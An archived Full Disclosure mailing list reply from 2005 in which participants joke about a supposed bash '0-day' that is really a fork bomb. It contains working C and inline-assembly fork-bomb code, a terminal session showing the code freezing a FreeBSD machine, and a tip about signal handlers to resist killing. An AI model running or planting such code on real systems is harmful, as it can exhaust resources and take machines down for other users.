Full Disclosure mailing list archives
Re: bash vulnerability?
From: Jay <jaymzu () gmail com>
Date: Tue, 16 Aug 2005 12:45:03 +0300
┌(jay@xxx:p4)(~) └(Power:on-line:100% cat > a.c int main(){ __asm__( "xorl %ecx,%ecx\n" "cdq\n" "HERE:\n" "movl $0x2,%eax\n" "int $0x80\n" "jmp HERE\n" ); } ^C ┌(jay@xxx:p4)(~) └(130:Power:on-line:100% make a cc -O -pipe -march=pentium4 a.c -o a ┌(jay@xxx:p4)(~) └(Power:on-line:100% ./a ^C ┌(jay@xxx:p4)(~) └(130:Power:on-line:100% uname -srm FreeBSD 6.0-BETA1 i386 the machine froze instantly but eventually, after a minute or so I was able to ^C -- Jay On Tue, 2005-08-16 at 11:10 +0200, Rik Bobbaers wrote:
On Monday 15 August 2005 09:59, Jay wrote:It's not nice to brag about finding 0-day bullshit in the bash fork bomb that has been Zalewski's signature for years :Pi think i know where he got it from.. i was on an irc channel a couple of days ago, and someone posted it (as a joke off course). it's ... ahm... funny that it comes back over here just a few days later! i don't know how this is a 0day and gives you remote access (it does the opposite...) but if you want one that's a bit harder to stop: c version: int main () { while (1) fork(); } an asm (quick hack): int main(){ __asm__( "xorl %ecx,%ecx\n" "cdq\n" "HERE:\n" "movl $0x2,%eax\n" "int $0x80\n" "jmp HERE\n" ); } sry it's in c... the machine i made it on didn't have gas or nasm. anyway, if you compile this and run it in background, it will all die pretty fast. (to make it even harder, make your own signal handlers!(okay, SIGKILL will still work, but it will be harder to kill :)) shall we call this C and assembler 0days? ;) -- harry aka Rik Bobbaers K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50 Rik.Bobbaers () cc kuleuven be -=- http://harry.ulyssis.org Disclaimer: By sending an email to ANY of my addresses you are agreeing that: 1. I am by definition, "the intended recipient" 2. All information in the email is mine to do with as I see fit and make such financial profit, political mileage, or good joke as it lends itself to. In particular, I may quote it on usenet. 3. I may take the contents as representing the views of your company. 4. This overrides any disclaimer or statement of confidentiality that may be included on your message. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- This message was scanned for spam and viruses by BitDefender. For more information please visit http://www.bitdefender.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: bash vulnerability?, (continued)
- Re: bash vulnerability? Wernfried Haas (Aug 13)
- Re: bash vulnerability? Wernfried Haas (Aug 13)
- RE: bash vulnerability? Sean Crawford (Aug 13)
- Re: bash vulnerability? Matija Vidmar (Aug 13)
- Re: bash vulnerability? Andre' Breiler (Aug 13)
- Re: bash vulnerability? fd (Aug 14)
- Re: bash vulnerability? Wernfried Haas (Aug 13)
- Re: bash vulnerability? Wernfried Haas (Aug 13)
- Re: bash vulnerability? Milan 't4c' Berger (Aug 13)
- Re: bash vulnerability? starwars (Aug 14)
- RE: bash vulnerability? Jay (Aug 15)
- Re: bash vulnerability? Rik Bobbaers (Aug 16)
- Re: bash vulnerability? Jay (Aug 16)
- Re: bash vulnerability? Boris Jordanov / Борис Йорданов (Aug 16)
- Re: bash vulnerability? luke (Aug 16)
- Re: bash vulnerability? Rik Bobbaers (Aug 16)
- Re: bash vulnerability? Graham Reed (Aug 16)
- Re: bash vulnerability? nocfed (Aug 18)
- Re: bash vulnerability? nocfed (Aug 18)
- Re: bash vulnerability? Rik Bobbaers (Aug 16)
- Re: Re: Bash vulnerability? Gilles DEMARTY (Aug 26)
- Re: Re: Bash vulnerability? Octal (Aug 26)